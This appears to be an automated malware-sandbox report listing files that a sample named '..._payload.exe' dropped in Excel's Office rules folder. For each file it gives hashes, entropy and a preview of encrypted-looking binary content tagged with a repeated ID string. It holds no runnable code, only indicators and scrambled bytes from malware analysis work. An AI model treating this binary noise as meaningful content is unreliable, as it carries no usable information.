                                                                                                      Preview:<?xml......2.Z..2 ....k...Hs4=.W.....s...|`B..m.....r.+BU...<....y...q7#I.1r{..7.4$...g..]..{.\.?.b.4.....C..wm..#..L.>..$..=.4.......E.Fz..5.M..]....]..*..lYMn.{..A.6.A.......3...3..F.Z...d..V.:.K.u]..7.jE<..I..{.C.zY..-d^8.[+GW.p......G...wy..=..[..N....f..l.."...A.A|N....Up..Sz...Ly.Y.p..z.9....`...3.........2..B+fqR/$T...n7.olT..o..H.L5#.F........N.T.P.Q_...&@*X..ET.Q(,.&.\....[.A..`n..s.../..{.6.....:....-MZ......AS....W.^L....&........)x..s...J....".N.TD.kJ....}./...q4.Y8..o.Q.k{o:.J....c.....t....h.eKl...xuiO_z..d.e.....O.{w.v....4.:X}c..1..+br.........9.....].5].;.......X.a..).B)..I}.{..5...r..&..|.....*$. .).1i..."F!%|.z.R.....O5R...M....v.e9.@_&..yq.e...7EG..#.JB...j.6=(...g.O.:$.."u+...<KA6Y#...@a.T.U.r.V+...=.G.*.^~..se%....8.Y{w."h..Q.. n...MhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490025v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):866
                                                                                                      Entropy (8bit):7.786057655474276
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:OYd1VKQRYFfBRhtkDBeWNPVS9TODbPa4Tht7dzOeFNCVSlXt+2AGJrv6cii9a:ldTLoEDBegc9TQTa4TX7Uebt3/3dv6bD
                                                                                                      MD5:758B736E4B186F0D243A05E0E7BEECC5
                                                                                                      SHA1:53C308A610A07EFD674C0C08EB929F47364D896A
                                                                                                      SHA-256:E4C877391BB99C8672D498791C730809C67FB05B17BF039B8AE55F72C6DF62B8
                                                                                                      SHA-512:0DFC151B8C9144861F369E5C4621706616D3A342A55D2A1ACCD542A7D5E69080F6B42D99CF2E82AAC6DB25309D50E2DCCE3FAEB0B08577B37747A08CE89ED401
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlR..U..\.*:#.\.....7U(~p.9.../#..mcG5....jW.i......1..X.F.u.9.0......H.....8Vq....9'..../{:5.$..n.-.@....S..9..,..O.Cm.....xd.k8.......~WK.1...:.J.4.>.P....Y..R.o..$T.3A.<.3";i#...'...K.O..hq...wI.I..P....d6t%...&._..C....k._.{].A=r...,..+!..O@..9!.1..W1.x.a....../..3P..Ey...(...3...e...6(........+Y..A.U....`.Y5..-..t......4.L.[..w.GE.......rp>...6W....2...oiQ...y........!.eR8Wc.......{\..k.-*....`..&...2...B......&._.5.3........a.@..4..D..ai..|...J.0g$.....k...K...V=....D"...W..s.@...'E....M....=H...v.'Pn...lf.......,.[1%.......S....k'.........e...m..g..&...O.*...SR;.8L{K..<].. V'.L...E....p.y.c....V...S'........;U.-7.....-@.....l.O...(q....<.gav..Bw%.T48.....!...`..B..{.Z.d...`....5.vg.... E*9..;..F.?.../a...U.....O$...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490027v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):860
                                                                                                      Entropy (8bit):7.739423796661836
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:R7aI+I2oq3nJYbuEdhvC4tz11SXTKIrv1CINk7Sa3dg+Lv6bD:tQ/nJB0h5z114TKIpCO/gRwD
                                                                                                      MD5:98B79C84B5ED2499CE790729CE0EC265
                                                                                                      SHA1:DEDAE23114F157A30C1595D7608885165CDFC053
                                                                                                      SHA-256:2BD9367D4AA1D6B901F25E021986819946CEECB60EB4BE9086F3BA342A9951D0
                                                                                                      SHA-512:2D9DA03873E6D15D39622881FFE66D8EA20369E696CDA4609D7E0E1C47C75AE9E4C8C571C1E22A001C258C388B7DBC8F24A7C56912ACCDFF69F2B633FA941037
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml9. ..d.....3...^.n.7W.w.B*..........K.............@.w....,..&..^....G.2..`.s.o.{G3....o.UynF^N+l....,..2u.RWa0.....D.u..%.E.....M..K...K._...h...y.0..l...l..C)L.....i...K"7'..mg...R..E...+..$b.z.2../.:;..#....$4q..rL..U...".A.c.....!.B....21:...L.....xE......;.L.].........g.R.....s..`....l!.M....%`..P....W.Hs.1.Q3.....Xy..:.."b...........B.j@_|..6.{y..^.j!9)WB.^.......[..t....,.....T.0~v.e.?...8.~h9P+...].......S..../P.a.v....i$..Y.JoR.....I.s.7.......Lo.=.w.<........G.........rH3.E......k.[.K.uPA.|4%...l*...znw.8.~/....Ho..j..NbN(2....."G...k..!.#6....y....F2..e.F.#E...k...]Vx..Vw...B+..-^.z.'|..Vm.......XU?hO..,...v.a..EQ#BG<eC..^.u,bz...:K(......%.f.<.'...V.A...bO...!.TM.Ok..?(0.s`....?....{..!..$e..8.O;....NU..X..'V=.qS1..]...,.YhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490028v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1057
                                                                                                      Entropy (8bit):7.8030182921360085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:s/YwOwll0LtbHRiPAnwMYZoXi//w1zT56HqYgrBkh0iZqrI8urhhsz4itqaW6v1S:vwl05hq/GzN2zyI8u3Y5v1Ar6nv6bD
                                                                                                      MD5:46612E4F28E1517C6D32C4D903AEB199
                                                                                                      SHA1:1D2F2E39E29B9ED80167B339D5AE591FFCBA031B
                                                                                                      SHA-256:E8B7BF93D8EFC5DA93B7F57208E606942896FF42ACFB8C32AB1E65F01BE1DAC9
                                                                                                      SHA-512:AD10496C7066CA74F277B71FF2AEBED4DDC64F6173F460140FFB017DFEC8B992B90836DBEBAB4BA394753927542B1D61278239D61573E689DB7A62064619B9CD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Z...*.;[U..}.DuU...1..}..:..........+..<\...NwW.xm...F..|.....o...\.[....K(..[N+2m|.JJ.E>.............F.z..U.^......u.wi=.?=uT.n.Mq..hn...l..$..$..E..cp...H....y^t[...U.5..|q. .1Q.#FKh.K..n.....W.hb.3.....xXN....u....*.....n..I.Q>V...SL#.g.(.z..o..R..$`.}.$.[....1.d5..`EE...B..S%.c..VP.....w..l..5T..Y.ZSZ......W.t.ul9 ..H..R...m.......).=..'.`!)...a..?e..;.PvD..q.... b?'.......os.3.JwX..z.W..5...a/..I.,..%..U.8F....Y%b.........../Z..~..L..WO.D....`.TYY..k=.v'z...y..1.B>v{._..l.S....s.>.....]..kw...y.J,254....g#....V..L...vh4iH-G...8..9.h.G...:......bl.6!\.B......n]9....F..T.u.F`..9.k.a..H.R._..K....7.....Y.G.n.%.a{5...j.,......vm..}."...j<......(d..B....NT.i..........^i.....I.2Yd..\...Vd....%y.?.]..t...<..1.$.;... L...2....@n...Yu...&.H..h......e.5....=..2N .Vd..Z..hI.$;hB/...>.L._.`1.<...$|.BWcc_...g.](.R..~4Z@#...q..1Y/..KL.sJ.S.Cb...%.q...^H..S.......;c.Z....`o...$V...)Bk+e.v+..S.....<....>qc..r..#.P.....a.hZRMDGn2o1XdryxaQbOJI

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490029v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):766
                                                                                                      Entropy (8bit):7.704784180113715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:mZ0rSo+BynBeJLM6bcINqu2HnAKn1hljq2CVHRx7lc90w/OD1c2RigwV9iR1Qzvk:mCSonA5nVqu2HAUhlml1D7TC4ieR1Qzs
                                                                                                      MD5:FA5CCC38420C5B1089E3F9B16C2AD83C
                                                                                                      SHA1:87C3660AE5427EBB04C6F7CA2942BB7655D18153
                                                                                                      SHA-256:769BA0D7204B83ACE70B236D3CC29000B7C24A6C87693A20D8CD9188BB04D72E
                                                                                                      SHA-512:5850CB26EB803BFD2D12F30D597CA3A5AF84E1527DA9409E15C97082FB1B133048A2B2867570B68057686ECCD3D01A58FDFDF8E4764157C908AE67799FC46546
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...S.s&.`.....j}....E..!]8d..VV.....,'@..].W....[r.,...s......$O9.....3.../t.....~...IK.....D.....:..PP.EpEI..6....-2....a..^.K.....47r..V..H/Z.Z.......YJW.7..c.SV....d..]ts..2..\..i.....!q...'.....Nr.X....z......1?2..0.......h.+.G.......S......{=.LwFJ}......e...d.;........6qE.q..N.~.....\..m+[...{n<...7.u..K......G.6}..n.I.F?.].E.{.4...@7..?M..7.4v4L......\"6.(..Y...v.6..'K.....].........zP=.M...r.*M...~+....~:..R.hS..0.#.....-xU1..e...].......p......3.h{D?....._.;..Zz..n.....m....D2t..$.:..ge..../.=p<{.[.f.w..<.__r.Ce..\Kp...(.4%wl...L.7].z.V.Ro.(....B..r....%}..w7..z5J......'.*.x..`.;.L..P..EG.*..?.rBUe..*.m.lK...'.._.....'.Q).v-..W}B.o.C\ChZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490030v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1037
                                                                                                      Entropy (8bit):7.790618719406928
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:k0lsupfPqrXvrUQip1gghy2otHY7T4NRDAykZUBv6bD:kA9pfaAyPtS8cykZkwD
                                                                                                      MD5:65147ACA9578A0F1ADC28B2FFA0BCC03
                                                                                                      SHA1:375A2A3991324964BE113C605375549E35E0A325
                                                                                                      SHA-256:8BC3A4C2A800F0A5A8218D0DB78B3380FCCDD6887C9ADCA149E6682713339F1C
                                                                                                      SHA-512:F357914982C95F5FB06A4462D2F4F068217E0DDC3B6B1AA8156CDBFE242B65DB3775352DF70E2F782D3BD2F01295C91BE4674C5F729E08B03ABAE9B7E6A08E98
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..G.v..V..]ot .;..@......zI.(.n.uz.~./z..-.....X.W.:.\h...~P..[.'./.Pe...(..7..6.........Mq.X?.v.&..f..a..NX....h....4=.b.;y.'........../...u|F.=V...h...0.32 }`.<....zJ....{....0... q..........f.....w.}....W$F....@MsckO#......$.&+..c..........0....or..z...T..`%....~....S...1.k..7.K-.....]^H..N#.....`u..YI.t.)..bmi.5z.P_9..UM!.H.".E.F@....6y-.(.,.........1..&*..[.......j...^.k;4....lLo~2....r...X.}.h{..kI2,C\.W.Q=....L5....GW..........!.W.I.Qr..g.(m2C}._p.X.....|.....3..n.C?W.m....9o...u.@...... ....P.9.z._Z........fJCr...nt.%&x.4.o".s...B.v~.y)...@.j.=X.NK.Z..-..:.?P.....~..'w.P...r..l.....d....>>....3d....&..,...-.......y.Z.......~.hJ:....f.|.xjfE....*....y.?...M..G....A...~Q...>..#Y1...G.q%...a{(.<.>...euF`...AW.....Q7.N.6..v.K..jm.T.)........U.0.(F..p:...zo.Q).......U.DH$.*.'..J.{.1K).2..*...*'0^.A.;.uu.~:..Z....P..r.....9...(m..p..2.{.....ZcK.#(....,mP(;.n..qg....wI...4.I.."5....I?hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490031v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):920
                                                                                                      Entropy (8bit):7.810611757360094
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:aBiHtpH93pgsDEH1AmHfA2aBLCVzxsNaYZrkv6bD:aQH793pM1AmHo35CV+NXrkwD
                                                                                                      MD5:579FB1CCD53BDCF91666A77493BBAAEA
                                                                                                      SHA1:565BBE64AE1319F6B0DB2B206DA2528E41287F10
                                                                                                      SHA-256:B47264DAF71117EB7744F6507EC8305A00297AD57C93D6AD386995FD8600E264
                                                                                                      SHA-512:53955BCCDCF13D9A2C0D0D57D0FD49DEF6FE94464A3ED282BC67F7401DEA0C397636F2D0E9286E81C54119A6577A441A2F9687D7D69F9857EF69ED2B95153289
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml`...'w.t..q...g.] m...'.k...}..s.3.p.dX..:...:)I.b....>.#<..)..*...<..o,..X9......z.E...+T.2....".._.-.;..(.)...+...U%A...m..x..M./.......:.k..}....J..Q.gq..*...yT.=...V.J.FT<.&},.y..$..&E..t@L...[r...c.....{.r&h.f.gd. Z.r.W.X....A.....a.&_\.J.......pp*..,|..Z.f.]x;R..`....Y..%b..E...XT0..*b..^..........,...._...Z.D.^.I....p.......Q....?eP.6(...(....l..0:3..'..|.F..<.K.%.....8...(..be06cI.......J..p..j.........[r~i.s.....-K.^.....>..I....Y......0...6l........S7.....`8_"..1..".xt.g.Oua@..w...(.p{g6.@.P.H.......Z...3.>]...q....|9.Z.]S<s'....^/....s..&]....o...y.%aN.!.x..c.G...?.:..A...@,.:..f`x.w.....1..W ..~..x.... 7>.k.J....U.2.u.h...A.....(.15..jB.sY.(..F.....d.......E..7:LdtA.(..Q.c4.c.....Q..l.L..V..{E....Y..?..N....=..4..d+"...Z.F!...4......,..|w.....my.......]..{.4.)..o....v.....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500000v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1147
                                                                                                      Entropy (8bit):7.82643040332137
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:69LD2dOUFuCgJR3NQA5vyFg5JKH/utZCY20nv6bD:SqYUFuZJjQAgiJ6/ub1nwD
                                                                                                      MD5:AAF71E3D7330CDC5390CD8908780894C
                                                                                                      SHA1:A320A3CB7B2D6C47111FA1760E3DF55E669C754F
                                                                                                      SHA-256:DF85BBB7E63269D534B9C301B8B6B65DE1C364D91677E50F125FBC7B0734697E
                                                                                                      SHA-512:279C64E1B992C06165701EAEB27CEB9C7AD4FA38AD7A50A7C049DE8453205FA63FEBC346506B72B87506A3BE2CCB2DC90D2B3CA5D53CB29BD88B5DA428F46BE3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.......H..i......4.n.p..7.g...s............h./.8..no...[..(..p8......O.8...`b.n...3+....Q...#...E/...".2&M..I}.J..L.T-Z.p....r...n....UU^.~.f....:.@.L)JtB.ML q...K$...(8.N....SE.9.8.w...."K..<......]..F.TZ.ga.<.Y....qp3...`.4...*...3r.j.c.!.R8J.....:}..M..^.S.Zk..8.......L..UPf.W.. ..N.]....9.L..........J.S..{&"...a;.......$)\.z..h....0.#...'...,..S..?...[...=.8B#w.S.....8F|s...i3.I.E.1...>.=A}5.(.x.D.R.a...88B.8...Y.V..B.l....|..Q..C.1k.]B1>....^Z.....U.:[.=..k...Jw..iJ...l.O.K...!N?p...qp..\:.?.:..._.W]B.a...)......Yc...8.A.y.s..T..qb.%/...K...........r......-y...ll...TJ...^....eu.X.*... >.caQ... .../?.:..3ra.....y..$..I...W..G. .....*_i.@r..<.p...g..A.=...<....).Y.p..L.....:.|.`t.-.T.......q&7m.z/u.. >7....0.......'V...A.......V.Z...*....df.<;..pF..[...H.,...__....c......Se..xX.=9.F\....L\.YqV[......E......j..,Ib...x..OYt.......,..a.Q+.?U...1<I..Bx...Y..zG6...a).....T.7...)>...7.[.^.B"lP.......e...y=..?......4....^.x^....Te.^..\

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500001v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1141
                                                                                                      Entropy (8bit):7.79804055290531
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tyy9WajxQLTKKnk4oFpU8m8OAK1rZYnsa7H3G9C5ZqljGwLhc5uQsY6Lv6bD:Uy97jiJnk418mLTYns4XVbtm5QsY6LwD
                                                                                                      MD5:8EBE2DBAF5D39029196FED5B3E126AC3
                                                                                                      SHA1:9A1A0C6B5B20F03FDF33BB2D0B7B2C0632917EA3
                                                                                                      SHA-256:10CC8852F9C65BDEA842470D9048568D221070DF411878CFAEC33496374CF174
                                                                                                      SHA-512:B69BDC62C66CF7F1E47A0A14C1FF865CCDD3668E31DB19AE702138D2FB69F2201BB4B2C1AC203FED299D888773A27F34DE680BD987E131E99C4C06C239093140
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...n...*..a.3.A..UZ.N....q.a..q.7p.(5T.......07Bc..4P..qx_fh..o..a.6..P...!.c..O.)o...bZ.....E..c.c;...-..s;~......` ..C.. x.........y..\i.\E...7.s..wA..b........*..Fa?...!L\...m. .oz.....=&.K.&..n.0.R.CN.p......]...L.....c....<.?w................;g.M.......0...Z............$....:.V..N%....d.#...P...|w......a.uU..bn`D.(w).8 .%]....).....$xT).k..h...4..0.V...j.: @...5 .L.Z........V....y9..O...K..aZ.U..(.V.U^."...O...yY...T....KG....v.3z.|... k.j$a.i.t3.z.KE./..:.s.b.J...g.H.".......\......6&...m..S.6-sE.r.D\*..49J..........p]7...$..>Q.>3D. jm..U.V.*.&0!.[h!A/&.A......nq..K.@...^.G.#+.....H...<....w....|a...)B..w../.....\zi..;v.D.k.....~..R...1..-..`fh.^..9..u\q'n5.P.|.U..3V."=..........,$...u..!.EAO.U{ "D..Y..BR.....8..w..~G].. .QV...7..'1.....gV.?.G.Pq.;.....r.G.(=.v7..j....4F...``f.........).@6.n...b..<..c..7.N...f.r.?(n..}2..x..~..^#...Qr...`W..i.t&i.._a..z.g[n.i.{yh.l....i^...../l.U............p..Dlt...-.S...3.M'.J.NN..z.j_...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500002v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1145
                                                                                                      Entropy (8bit):7.82260670407378
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mj5aCOqz9Bt8fXuZQrXIFE5XtdbhI8ZPKOYlcQ6hnyfWha1FGkJSev6bD:QTFzIXuZQMFgXbhaT6hn+qbewD
                                                                                                      MD5:3569347B790F27EBB17DEF2C239B521B
                                                                                                      SHA1:9E5D3E5800BF7503B2476E465A90D6A365754D5E
                                                                                                      SHA-256:25F8420EFFB44A4BF364D71F57697C420FDECF904677A8F56DFBAE56E75E4136
                                                                                                      SHA-512:0D6E2E4A2188DF100C306E3F0B975EB30C7B2CC0E204D77A52C039FC56F698E16B03CB2AD34D2C174633A3F54B6759268BF6C8ECE93D494F72E11507D27F5E9F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml~.6I.<.69..(q..2....``...k..E4.W..i.N...Gd-"...$.Yl....P.7W&....2n.X..m..M._.Q....&..#.KC..+....*B....{d....&.a/|.T....~..;'..CS..gnF.....(.....(....H.<.}Fb......o.3ta:..L..[...,4.....B..F:S...^.].p.uq..4...+...SjL...&...&S.|I.A...!....\.kX...V.>......8..N./.u....0'%.8........@..-~[.a.L.4;wB.+..h% [.5D....ODK.......9f.{.X....[.(.RU.R..O2...8Q..O...._.O1%.T....}..+1...r.Qu.]........Hh.U+..i.$.8j...O..f.rG......S....38.4Y...E...q##t.}.o.8~..J.......d%.,...K..(.<.n`.....c.....U.M.....^/`.p^.....9...p.L)..bE..C..K..cUX..Y....(../.cyfb....~.eV.;o$ct&H....t__2.!.HN.kW.R.&./y...b..w...b..u.4.3.Y...,:3^KW.I...W....O.G~...b.B#.:.:1.E.o>..p.r..*.c..._...:k..T.I.<.~.0.6*n.L_.0b!q..M...=Q...*..)....+.g.H...g..:...)t.-....e]....:...t..6..q...f..0.W..(&......B.rR..q.k.....g9.`w..%7..\.Q}....`.z|m.*..v..T..[K...>.m...?....=..y.b.._...A.'.P_...U>...&..H........;q...7tQ.b.<..!N.3..a......*%....%..N?..`q....Ro.=.q..?.P....;....'.p.c^F..U.....I..n..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500003v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1145
                                                                                                      Entropy (8bit):7.817282272958292
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+Ji5jpNJ3Kqp3QM9DgLmhtxZsO1cRWOp7y3FaoAYNU/+ZyU1v6bD:+U5jV6a379Eyt4OORiFPdZymwD
                                                                                                      MD5:E9405C5A8F2DAE42489A0B89F4AD0035
                                                                                                      SHA1:B03B210641D40FFBFC6068305EAE8B73B13F9942
                                                                                                      SHA-256:39955CAFF67F9945D8CC4859F117369EB6CAC7F4C136152518F452CFEB82CC62
                                                                                                      SHA-512:2CEC5F1A2C224C27184FA0914491AD21EFF5C8906CA69544CFF1706A7CC72575F70AE6FBB0933FCFE59CA60F86BD36A0056F6F1D5A2F17823EF26C789E341FF2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....?d..*Om5]...!.~yB.t.g.p.;........._iG.....r Pe...SX.._..q.NG8.3..:...1..........S..(=....Z.r.O......G......t.9O.po.Q.E...|.........zpG.zd+.F'..te)..&.....L..@..U.....s!.......s3UL\y.~......9.."......5,O{wBl..J.Fhf.p..E.J.z..A!*..4...-."kU.e.......o...9...O.0&.(.E~D...1.... ?.@$.N.8.../.%..g..mc....B..,+..).3...B...J+}G..$.3y.G.KR}Yc.j.4.........D.....E..)./.&...*...MWb....6...<j.s....(_.....Kd...S,.i)....b.T..*]..Z.;..WL.........TQ....u..F.....4.8.Zc.@h..#..l.3g..`.'r.(<..v...=.wZ.]Y...(<=.V..#.d.dk....2.r.=e).Tt.L..dg..V..._.1a....g.=.|G8.p].].~......F&._.X..n.g..%.V".qC.I.~..)z..("A.J}g..`.......b...U....-.....H:Qc`.......7........=....5..bM.L..~>....I>0 u...fu..,W...o..r... 4..A..6N..H..........ca%....{.*._..F.n.+.....w.W$..h`.5Y..b..m.-Cv.L...6.C.W..}..yI|{.g."..M.j..2./L.d..5....ve.V.....l....Nc5...{...d.Qx~.X"y..^\....h.|/.S`.........A`.eC<a(....]...-+...z...k.^.;K.N..SB.O..i...m.....>............2I.6.N1...r..Ii"..I.;..mJ\...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500004v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1145
                                                                                                      Entropy (8bit):7.820907968151624
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ybddBDdVzHEihfHwdm3zfK9eMp5k3X2fRrXmT5IN0J0CdDmUH+zv6bD:ybddBpFki5HH7/o5k25m5lJnxDWwD
                                                                                                      MD5:FF49F5C12AE2954B30C69308035DBFBB
                                                                                                      SHA1:F7715A87618351CDF7BB2C1907090505C57A842F
                                                                                                      SHA-256:E752219DA891B18060774BE6DD067C9DA12C1A12F416796A882BD0577191A0D8
                                                                                                      SHA-512:0CC9A7A3868FD02F0CBF8F40436CB46A9F21DB528BEEE449899D1BD8DDB22A31D16D43372A94C267081FA330D8C37E0FD7980F42096A13753740D741FF91F3DC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlr-".;...G.....j..%..g....Z.xk.}......|..yh.....I.,&QL.O.. 9..QPY.#.;..)W.;.6U...O...8j..D1P.f .1.....w...].wt&.._.......f=....g..;..v......e.....ph--.}...27k.3xJ]8T.[....s.R.w........c'....*..n.....s.........Ov..Y.=.d8...y....:fW..Y.Q..._V..~fN..v.."V+.a...........X.^.q_...s".g...N...EU9_.._.m|~..&..^P..97.Mu.J..N...6nb9.|..mU.f).A.. .XyZ.'..I...a._..pD...EdO..t/Y"8(....~`.q....W...hcK.....xyR..p..>_.....l}nWV.?.N.y... ...}..l.tQ^.. .........k..kd..o..o....2..V.fb2..I5....+}.....g.1..W...o.y..J..3....n.......)..x|sOkP.6........Ee..k`..Q1.'.l.w.j..)....5..;@.?1i,.....'......BG.........'x.*..B...A...^..i6Q(.@.>..=BYS\.....g...q+...X..)...8.... /.."l......@.=..R+...j.._.1|D..XH.o.......c...e..%<........w..._..V.[....)`..Im.yV.c.....I......b>..t...V..x../....\.C;..{H...."..H.{L.TBM8..."..&$.......b....+q)...W.|7....e{...0...4...31.1...`E.j.......~...F.......N.d.kz....x..4...|.)...~.$...l'9.M.r^..Eq[P...@.....V+....\M.....f

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500005v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1144
                                                                                                      Entropy (8bit):7.829312845710127
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:uvYnvGpD5rKftNW0QmKXVDZ8ln07tVcUYeMJmyvKfpVobbnv6bD:0KvGVQftNvQ3FDm0/cUEmmKw/wD
                                                                                                      MD5:DA7E1949DE73D955969B8ED4EF1978A6
                                                                                                      SHA1:A9CDDB983C00090FE6B459F3EB4B61C136BBD95A
                                                                                                      SHA-256:5D475C3120F65FE071897755976FAB2C4A665BBE6AE80BF572DCD5E13B5EAD1E
                                                                                                      SHA-512:D3D5A8676AF3ADB723FC72FDD4CC1D37EA55C7D6F38B176902C1215D3F6432E86D83CCBE16202CE05E1DFE5B927F64B8A957DE5CBF2324B1C614B3DE73060040
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..y_..J%U........R<w)_...V.ux....Lb...W...;oT.$.c........W?...!.F.D2....a..FK%.nzK.u17.NkL...u#.c'..h...e...5.y.,:.'se.PsW......En...N.".....a....5.t.;.nC\..G4..6...V.N.L.....)..m.SI......4~^.`/"L.S.$./..4.%....8....DR..r.C.....n.+.}..vT....,6.U.Gbb........+..y..^...#=piq...kT.$......Z.....k..f.T.<...v..k....I..Vh..N......?..)....I..z..~9..#.Z..#O..t..8.dH.j.O.$=.............\0..yD.....c....J.....\......GM.S...J..W.N..!....k.gNE\.^.....W0.Vz..e(n...z#U....@.E=.n....7.;..<A.At3.e`4......yZ.5|].].......!...].9O2......g.Mo.3......I.$..,."u. ...a<.b%...A...L$].A.L\...].......'.AH...n1.2N.u.t.........YF_.o.5C`).5...........qS.......8...y46...X/...J..G.......S...q`4B..7.r.A<.7......?j..<..~.........G\1:..q.....[.Xk..l......6.p...............h....TSbQ!E6.....Fi#pS......N& ......vg.,...+.k..........z.(f..]?..m...2='.?E.tq.J.bu.#V..v.l.f..........Agq.aRU..k.v.....8.!....J...j...K.O...L.0T..*.N..,Mh....Y_.Ls..(X......3.}u...8.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500006v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):848
                                                                                                      Entropy (8bit):7.701565733709387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:g85iUHqFU0UuLb2+ec5AJmdWKDuouMe8DPU/qSQu7v6bD:gcEUts2+1AkpDuouMe8DPU/qSQu7wD
